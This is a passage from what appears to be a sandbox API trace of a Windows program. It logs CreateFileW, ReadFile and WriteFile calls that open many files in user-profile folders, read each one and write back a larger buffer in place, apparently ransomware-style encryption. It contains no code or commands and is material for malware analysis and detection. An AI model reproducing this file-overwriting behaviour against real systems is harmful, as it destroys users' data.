lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.545] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.545] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x31d [0179.545] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.545] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.545] ReleaseMutex (hMutex=0x168) returned 1 [0179.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="05_Pictures_taken_in_the_last_month.wpl", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0179.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="05_Pictures_taken_in_the_last_month.wpl", cchWideChar=39, lpMultiByteStr=0x1fa53fc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="05_Pictures_taken_in_the_last_month.wpl", lpUsedDefaultChar=0x0) returned 39 [0179.545] ReadFile (in: hFile=0x204, lpBuffer=0x2878b08, nNumberOfBytesToRead=0x31d, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2878b08*, lpNumberOfBytesRead=0x345f2bc*=0x31d, lpOverlapped=0x0) returned 1 [0179.547] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0179.547] WriteFile (in: hFile=0x204, lpBuffer=0x287ec68*, nNumberOfBytesToWrite=0x8a5, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x287ec68*, lpNumberOfBytesWritten=0x345f2d0*=0x8a5, lpOverlapped=0x0) returned 1 [0179.547] CloseHandle (hObject=0x204) returned 1 [0179.547] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.548] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.548] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x5e4 [0179.548] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.548] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.548] ReleaseMutex (hMutex=0x168) returned 1 [0179.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0179.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", cchWideChar=55, lpMultiByteStr=0x1f96a44, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpUsedDefaultChar=0x0) returned 55 [0179.549] ReadFile (in: hFile=0x204, lpBuffer=0x26cf6b8, nNumberOfBytesToRead=0x5e4, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesRead=0x345f2bc*=0x5e4, lpOverlapped=0x0) returned 1 [0179.550] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0179.550] WriteFile (in: hFile=0x204, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xb6c, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x345f2d0*=0xb6c, lpOverlapped=0x0) returned 1 [0179.550] CloseHandle (hObject=0x204) returned 1 [0179.550] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.551] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.551] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xff [0179.551] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.551] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.551] ReleaseMutex (hMutex=0x168) returned 1 [0179.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.htm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0179.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.htm", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bears.htm", lpUsedDefaultChar=0x0) returned 9 [0179.551] ReadFile (in: hFile=0x204, lpBuffer=0x1eea868, nNumberOfBytesToRead=0xff, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea868*, lpNumberOfBytesRead=0x345f2bc*=0xff, lpOverlapped=0x0) returned 1 [0179.552] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0179.553] WriteFile (in: hFile=0x204, lpBuffer=0x2663f68*, nNumberOfBytesToWrite=0x687, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663f68*, lpNumberOfBytesWritten=0x345f2d0*=0x687, lpOverlapped=0x0) returned 1 [0179.553] CloseHandle (hObject=0x204) returned 1 [0179.553] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.554] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.554] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xed [0179.554] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.554] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.554] ReleaseMutex (hMutex=0x168) returned 1 [0179.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shades of Blue.htm", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0179.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shades of Blue.htm", cchWideChar=18, lpMultiByteStr=0x1f88b2c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Shades of Blue.htm", lpUsedDefaultChar=0x0) returned 18 [0179.554] ReadFile (in: hFile=0x204, lpBuffer=0x1ea4ca8, nNumberOfBytesToRead=0xed, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ca8*, lpNumberOfBytesRead=0x345f2bc*=0xed, lpOverlapped=0x0) returned 1 [0179.555] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0179.556] WriteFile (in: hFile=0x204, lpBuffer=0x2663f68*, nNumberOfBytesToWrite=0x675, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663f68*, lpNumberOfBytesWritten=0x345f2d0*=0x675, lpOverlapped=0x0) returned 1 [0179.556] CloseHandle (hObject=0x204) returned 1 [0179.556] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.557] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.557] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x130 [0179.557] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.557] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.557] ReleaseMutex (hMutex=0x168) returned 1 [0179.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="94308059B57B3142E455B38A6EB92015", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0179.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="94308059B57B3142E455B38A6EB92015", cchWideChar=32, lpMultiByteStr=0x1fa53fc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="94308059B57B3142E455B38A6EB92015", lpUsedDefaultChar=0x0) returned 32 [0179.558] ReadFile (in: hFile=0x204, lpBuffer=0x1f19368, nNumberOfBytesToRead=0x130, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f19368*, lpNumberOfBytesRead=0x345f2bc*=0x130, lpOverlapped=0x0) returned 1 [0179.559] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0179.559] WriteFile (in: hFile=0x204, lpBuffer=0x2663f68*, nNumberOfBytesToWrite=0x6b8, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663f68*, lpNumberOfBytesWritten=0x345f2d0*=0x6b8, lpOverlapped=0x0) returned 1 [0179.559] CloseHandle (hObject=0x204) returned 1 [0179.559] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.560] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.561] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x11a [0179.561] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.561] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.561] ReleaseMutex (hMutex=0x168) returned 1 [0179.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0179.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0179.561] ReadFile (in: hFile=0x204, lpBuffer=0x1ec8178, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ec8178*, lpNumberOfBytesRead=0x345f2bc*=0x11a, lpOverlapped=0x0) returned 1 [0179.562] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0179.563] WriteFile (in: hFile=0x204, lpBuffer=0x2663f68*, nNumberOfBytesToWrite=0x6a2, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663f68*, lpNumberOfBytesWritten=0x345f2d0*=0x6a2, lpOverlapped=0x0) returned 1 [0179.563] CloseHandle (hObject=0x204) returned 1 [0179.563] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.565] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.565] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x86 [0179.565] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.565] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.565] ReleaseMutex (hMutex=0x168) returned 1 [0179.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Store.url", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0179.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Store.url", cchWideChar=19, lpMultiByteStr=0x1f88b2c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Store.url", lpUsedDefaultChar=0x0) returned 19 [0179.566] ReadFile (in: hFile=0x204, lpBuffer=0x2673048, nNumberOfBytesToRead=0x86, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x345f2bc*=0x86, lpOverlapped=0x0) returned 1 [0179.567] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0179.567] WriteFile (in: hFile=0x204, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60e, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x345f2d0*=0x60e, lpOverlapped=0x0) returned 1 [0179.567] CloseHandle (hObject=0x204) returned 1 [0179.567] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0179.568] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.568] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x85 [0179.568] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0179.568] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.568] ReleaseMutex (hMutex=0x168) returned 1 [0179.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows Live Gallery.url", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0179.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Windows Live Gallery.url", cchWideChar=24, lpMultiByteStr=0x1f8fd5c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Windows Live Gallery.url", lpUsedDefaultChar=0x0) returned 24 [0179.569] ReadFile (in: hFile=0x204, lpBuffer=0x2673048, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673048*, lpNumberOfBytesRead=0x345f2bc*=0x85, lpOverlapped=0x0) returned 1 [0180.129] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0180.129] WriteFile (in: hFile=0x204, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x60d, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x345f2d0*=0x60d, lpOverlapped=0x0) returned 1 [0180.129] CloseHandle (hObject=0x204) returned 1 [0180.129] CreateFileW (lpFileName="C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0180.131] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0180.131] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x14 [0180.131] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0180.131] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.131] ReleaseMutex (hMutex=0x168) returned 1 [0180.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntuser.ini", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0180.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntuser.ini", cchWideChar=10, lpMultiByteStr=0x1f7356c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntuser.ini", lpUsedDefaultChar=0x0) returned 10 [0180.131] ReadFile (in: hFile=0x204, lpBuffer=0x1f733c8, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f733c8*, lpNumberOfBytesRead=0x345f2bc*=0x14, lpOverlapped=0x0) returned 1 [0180.132] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0180.132] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x59c, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x345f2d0*=0x59c, lpOverlapped=0x0) returned 1 [0180.133] CloseHandle (hObject=0x204) returned 1 [0180.133] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0180.133] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0180.133] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x8d1 [0180.134] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0180.134] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.134] ReleaseMutex (hMutex=0x168) returned 1 [0180.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Google Chrome.lnk", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0180.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Google Chrome.lnk", cchWideChar=17, lpMultiByteStr=0x1f88c44, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Google Chrome.lnk", lpUsedDefaultChar=0x0) returned 17 [0180.134] ReadFile (in: hFile=0x204, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x8d1, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x345f2bc*=0x8d1, lpOverlapped=0x0) returned 1 [0180.135] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0180.135] WriteFile (in: hFile=0x204, lpBuffer=0x2887b18*, nNumberOfBytesToWrite=0xe59, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2887b18*, lpNumberOfBytesWritten=0x345f2d0*=0xe59, lpOverlapped=0x0) returned 1 [0180.135] CloseHandle (hObject=0x204) returned 1 [0180.135] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0180.136] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0180.136] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x24a [0180.136] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0180.136] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.136] ReleaseMutex (hMutex=0x168) returned 1 [0180.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1f7356c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0180.137] ReadFile (in: hFile=0x204, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x24a, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x345f2bc*=0x24a, lpOverlapped=0x0) returned 1 [0180.138] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0180.138] WriteFile (in: hFile=0x204, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x7d2, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x345f2d0*=0x7d2, lpOverlapped=0x0) returned 1 [0180.138] CloseHandle (hObject=0x204) returned 1 [0180.138] CreateFileW 